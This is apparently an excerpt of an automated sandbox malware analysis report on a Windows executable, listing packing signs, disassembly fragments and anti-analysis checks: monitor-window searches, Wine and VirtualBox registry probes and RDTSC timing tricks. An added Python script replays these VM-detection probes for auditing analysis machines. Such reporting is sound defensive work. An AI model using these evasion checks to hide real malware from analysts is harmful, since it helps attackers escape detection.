                Source: OtHVIQ2ge4.exe | Static file information: File size 2976256 > 1048576
                Source: OtHVIQ2ge4.exe | Static PE information: Raw size of hmbcuswq is bigger than: 0x100000 < 0x2aea00

                Data Obfuscation

                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Unpacked PE file: 0.2.OtHVIQ2ge4.exe.570000.0.unpack :EW;.rsrc :W;.idata :W;hmbcuswq:EW;jagdmkfn:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;hmbcuswq:EW;jagdmkfn:EW;.taggant:EW;
                Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
                Source: OtHVIQ2ge4.exe | Static PE information: real checksum: 0x2d7e1c should be: 0x2dee5c
                Source: OtHVIQ2ge4.exe | Static PE information: section name:
                Source: OtHVIQ2ge4.exe | Static PE information: section name: .rsrc
                Source: OtHVIQ2ge4.exe | Static PE information: section name: .idata
                Source: OtHVIQ2ge4.exe | Static PE information: section name: hmbcuswq
                Source: OtHVIQ2ge4.exe | Static PE information: section name: jagdmkfn
                Source: OtHVIQ2ge4.exe | Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Code function: 0_3_0175C17F push 38E08617h; ret 0_3_0175C1B3
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Code function: 0_3_017594CA push esp; ret 0_3_017594E1
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Code function: 0_3_0175C1B5 push 38E08617h; ret 0_3_0175C1B3
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Code function: 0_3_017594B2 push ecx; ret 0_3_017594C9
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Code function: 0_3_01759692 push ss; ret 0_3_017596F1
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Code function: 0_3_0175961A push cs; ret 0_3_01759631
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Code function: 0_3_0175928A pushfd ; ret 0_3_017592A1
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Code function: 0_3_016ECB68 push 68016ECBh; retf 0_3_016ECB6D
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Code function: 0_3_016ED0DC pushad ; retf 0_3_016ED0DD
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Code function: 0_3_016ECB54 push eax; retf 0_3_016ECB55
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Code function: 0_3_016ECB50 push eax; retf 0_3_016ECB51
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Code function: 0_3_016ECD9E pushad ; retf 0_3_016ECE19
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Code function: 0_3_0170BC67 push cs; iretd 0_3_0170BC68
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Code function: 0_3_01711DD4 pushad ; ret 0_3_01711DD9
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe | Code function: 0_3_0171290C push esp; retf 0_3_01712911
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeCode function: 0_3_0175C17F push 38E08617h; ret 0_3_0175C1B3
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeCode function: 0_3_0175C17F push 38E08617h; ret 0_3_0175C1B3
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeCode function: 0_3_017594CA push esp; ret 0_3_017594E1
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeCode function: 0_3_017594CA push esp; ret 0_3_017594E1
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeCode function: 0_3_0175C1B5 push 38E08617h; ret 0_3_0175C1B3
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeCode function: 0_3_0175C1B5 push 38E08617h; ret 0_3_0175C1B3
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeCode function: 0_3_017594B2 push ecx; ret 0_3_017594C9
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeCode function: 0_3_017594B2 push ecx; ret 0_3_017594C9
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeCode function: 0_3_01759692 push ss; ret 0_3_017596F1
                Source: OtHVIQ2ge4.exeStatic PE information: section name: entropy: 7.983564281596194

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeWindow searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeWindow searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeWindow searched: window name: Regmonclass
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeWindow searched: window name: Filemonclass
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeSystem information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
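                The three probes above (the firmware-table query, the Wine registry key and the VirtualBox ACPI DSDT key) and the window-class searches listed under Boot Survival can be replayed inside an analysis VM to see which of them would succeed there. The script below is an added example written for that purpose; it is not code from the report or from the sample. The report shows only that the SMBIOS firmware table was queried, not which strings the sample compares it against, so the hypervisor marker list, the constructed SMBIOS blob and the helper names are assumptions. Windows-only calls are isolated so the pure string scan can run offline on any platform.

```python
"""Audit an analysis VM for the artifacts this sample probes.

Added example, not part of the Joe Sandbox report and not the sample's code.
It replays the checks the report shows: FindWindow on the Filemon/Procmon/Regmon
window classes, RegOpenKey on the Wine and VBOX__ keys, and a
GetSystemFirmwareTable('RSMB') read scanned for hypervisor vendor strings.
"""
import ctypes
import sys

# Window class names the sample searches for (from the report). The report's
# lowercase variants (Regmonclass, Filemonclass) are the same names with
# different casing.
MONITOR_WINDOW_CLASSES = ("FilemonClass", "PROCMON_WINDOW_CLASS", "RegmonClass")

# Registry keys the sample opens (from the report). The DSDT subkey mirrors the
# OEM ID of the ACPI DSDT table, which VirtualBox sets to "VBOX  ".
PROBED_KEYS = (
    ("HKEY_CURRENT_USER", r"Software\Wine"),
    ("HKEY_LOCAL_MACHINE", r"HARDWARE\ACPI\DSDT\VBOX__"),
)

# Assumption: the report does not show which strings the sample looks for in
# the firmware table, so this is a generic list of hypervisor vendor strings.
HYPERVISOR_MARKERS = (b"VirtualBox", b"innotek", b"VMware", b"QEMU", b"Xen",
                      b"Virtual Machine", b"Parallels")

# Provider signature 'RSMB' for GetSystemFirmwareTable (raw SMBIOS table).
RSMB = 0x52534D42

# Constructed SMBIOS-like blob for offline use: a RawSMBIOSData header followed
# by a NUL-separated string table as a VirtualBox guest would expose it.
SAMPLE_VBOX_SMBIOS = (b"\x00\x02\x07\x00\x20\x00\x00\x00"
                      b"innotek GmbH\x00VirtualBox\x001.2\x00\x00")


def find_firmware_markers(raw_table, markers=HYPERVISOR_MARKERS):
    """Return the markers found in a raw SMBIOS blob, in marker-list order.

    A plain byte search is sufficient: SMBIOS string tables are NUL-separated
    ASCII, and a substring scan is also what samples typically do.
    """
    return [m.decode("ascii") for m in markers if m in raw_table]


def read_smbios_table():
    """Fetch the raw SMBIOS table via GetSystemFirmwareTable. Windows only."""
    k32 = ctypes.windll.kernel32
    k32.GetSystemFirmwareTable.restype = ctypes.c_uint
    size = k32.GetSystemFirmwareTable(RSMB, 0, None, 0)
    if size == 0:
        return b""
    buf = ctypes.create_string_buffer(size)
    k32.GetSystemFirmwareTable(RSMB, 0, buf, size)
    return buf.raw


def find_monitor_windows():
    """Return the monitor window classes FindWindowW can see. Windows only."""
    u32 = ctypes.windll.user32
    u32.FindWindowW.restype = ctypes.c_void_p
    return [cls for cls in MONITOR_WINDOW_CLASSES if u32.FindWindowW(cls, None)]


def find_probed_keys():
    """Return the probed registry keys that open successfully. Windows only."""
    import winreg
    hives = {"HKEY_CURRENT_USER": winreg.HKEY_CURRENT_USER,
             "HKEY_LOCAL_MACHINE": winreg.HKEY_LOCAL_MACHINE}
    present = []
    for hive, path in PROBED_KEYS:
        try:
            winreg.CloseKey(winreg.OpenKey(hives[hive], path))
            present.append(hive + "\\" + path)
        except OSError:
            pass  # key absent: this probe would not fire
    return present


def audit():
    """Run every live probe and return what a sample like this one would find."""
    if sys.platform != "win32":
        raise RuntimeError("live probes need Windows; find_firmware_markers() works offline")
    return {
        "monitor_windows": find_monitor_windows(),
        "registry_keys": find_probed_keys(),
        "firmware_markers": find_firmware_markers(read_smbios_table()),
    }


if __name__ == "__main__":
    print("constructed sample:", find_firmware_markers(SAMPLE_VBOX_SMBIOS))
    if sys.platform == "win32":
        for check, hits in audit().items():
            print(f"{check}: {hits or 'none'}")
```

                Any non-empty result is an artifact the sample's checks would pick up; the usual fixes are renaming the Procmon window class through a patched build, clearing the DSDT OEM ID in the hypervisor configuration, and overriding the SMBIOS strings at the hypervisor level rather than in the guest.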
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5C7F11 second address: 5C7F17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5C7F17 second address: 5C7F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 74C206 second address: 74C230 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF628B69586h 0x00000008 jnp 00007FF628B69586h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF628B69598h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 74C50C second address: 74C517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF628D73F56h 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 74C517 second address: 74C527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FF628B69586h 0x0000000a js 00007FF628B69586h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 74C527 second address: 74C52B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 74C52B second address: 74C53E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF628B69586h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 74C53E second address: 74C557 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007FF628D73F56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF628D73F5Bh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 74C683 second address: 74C68E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF628B69586h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 74C93F second address: 74C948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 5C7EF7 second address: 5C7F11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF628B69593h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 75037F second address: 75038C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 75038C second address: 750391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 750391 second address: 750397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 750397 second address: 7503A8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7503A8 second address: 7503DC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [eax] 0x00000009 push ecx 0x0000000a jmp 00007FF628D73F69h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF628D73F5Ah 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7503DC second address: 5C7F11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B69599h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a sub dword ptr [ebp+122D1EEAh], ecx 0x00000010 push dword ptr [ebp+122D14DDh] 0x00000016 jmp 00007FF628B6958Dh 0x0000001b jmp 00007FF628B69597h 0x00000020 call dword ptr [ebp+122D1F1Fh] 0x00000026 pushad 0x00000027 mov dword ptr [ebp+122D1CE9h], ebx 0x0000002d xor eax, eax 0x0000002f pushad 0x00000030 mov di, B370h 0x00000034 or dword ptr [ebp+122D20C9h], ebx 0x0000003a popad 0x0000003b mov edx, dword ptr [esp+28h] 0x0000003f pushad 0x00000040 mov ah, 48h 0x00000042 mov esi, dword ptr [ebp+122D2CD1h] 0x00000048 popad 0x00000049 mov dword ptr [ebp+122D2DB9h], eax 0x0000004f stc 0x00000050 stc 0x00000051 mov esi, 0000003Ch 0x00000056 jmp 00007FF628B69594h 0x0000005b add esi, dword ptr [esp+24h] 0x0000005f stc 0x00000060 cld 0x00000061 lodsw 0x00000063 add dword ptr [ebp+122D1CE9h], ecx 0x00000069 jmp 00007FF628B6958Ah 0x0000006e add eax, dword ptr [esp+24h] 0x00000072 jns 00007FF628B69592h 0x00000078 mov ebx, dword ptr [esp+24h] 0x0000007c stc 0x0000007d mov dword ptr [ebp+122D1CE9h], ebx 0x00000083 nop 0x00000084 je 00007FF628B69592h 0x0000008a jnp 00007FF628B6958Ch 0x00000090 push eax 0x00000091 push eax 0x00000092 push edx 0x00000093 jmp 00007FF628B69593h 0x00000098 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 750498 second address: 7504D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 1B92B0B8h 0x00000010 mov edi, dword ptr [ebp+122D20DBh] 0x00000016 push 00000003h 0x00000018 stc 0x00000019 push 00000000h 0x0000001b add si, 6E35h 0x00000020 push 00000003h 0x00000022 and ch, 00000002h 0x00000025 call 00007FF628D73F59h 0x0000002a push esi 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7504D9 second address: 7504DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7504DD second address: 7504E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7504E1 second address: 7504F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FF628B69586h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7504F2 second address: 7504FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7504FC second address: 750500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 750500 second address: 750535 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF628D73F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007FF628D73F5Bh 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FF628D73F67h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 750535 second address: 75053B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 750739 second address: 75073E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 75073E second address: 750795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push esi 0x00000009 jmp 00007FF628B6958Fh 0x0000000e pop esi 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007FF628B69596h 0x00000018 mov eax, dword ptr [eax] 0x0000001a jl 00007FF628B69592h 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 pushad 0x00000025 jc 00007FF628B69588h 0x0000002b pushad 0x0000002c popad 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 750830 second address: 75086C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF628D73F65h 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF628D73F5Bh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 75086C second address: 750901 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B69590h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF628B69598h 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 je 00007FF628B69599h 0x00000019 jno 00007FF628B69593h 0x0000001f mov eax, dword ptr [eax] 0x00000021 jnc 00007FF628B6959Bh 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b jg 00007FF628B6958Eh 0x00000031 pop eax 0x00000032 cmc 0x00000033 lea ebx, dword ptr [ebp+1245C2D4h] 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jne 00007FF628B69591h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 736B46 second address: 736B56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FF628D73F56h 0x0000000a jnp 00007FF628D73F56h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 76F53F second address: 76F544 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 76F544 second address: 76F54A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 76F815 second address: 76F81B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 76F81B second address: 76F82C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jng 00007FF628D73F82h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 76F82C second address: 76F832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 76F832 second address: 76F836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 76F836 second address: 76F84E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B69594h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 76F978 second address: 76F97C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 76F97C second address: 76F99E instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF628B69586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007FF628B69594h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 76F99E second address: 76F9B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FF628D73F56h 0x0000000f jnc 00007FF628D73F56h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7701C0 second address: 7701C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7705C9 second address: 7705CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7705CF second address: 7705D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7705D5 second address: 7705DA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7705DA second address: 77062B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF628B69586h 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007FF628B6958Eh 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 pushad 0x00000018 ja 00007FF628B69586h 0x0000001e jnp 00007FF628B69586h 0x00000024 push esi 0x00000025 pop esi 0x00000026 jmp 00007FF628B69597h 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e jno 00007FF628B69586h 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 77062B second address: 77062F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 770768 second address: 77076C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 77076C second address: 77077C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FF628D73F5Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 770EAE second address: 770EC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B69597h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7710A2 second address: 7710A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7710A8 second address: 7710C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B69597h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7710C3 second address: 7710DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F67h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 771512 second address: 771516 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 77427C second address: 7742B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF628D73F69h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jc 00007FF628D73F65h 0x00000014 jmp 00007FF628D73F5Fh 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7747EE second address: 7747F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7443AE second address: 7443B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\OtHVIQ2ge4.exeRDTSC instruction interceptor: First address: 7443B2 second address: 7443B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
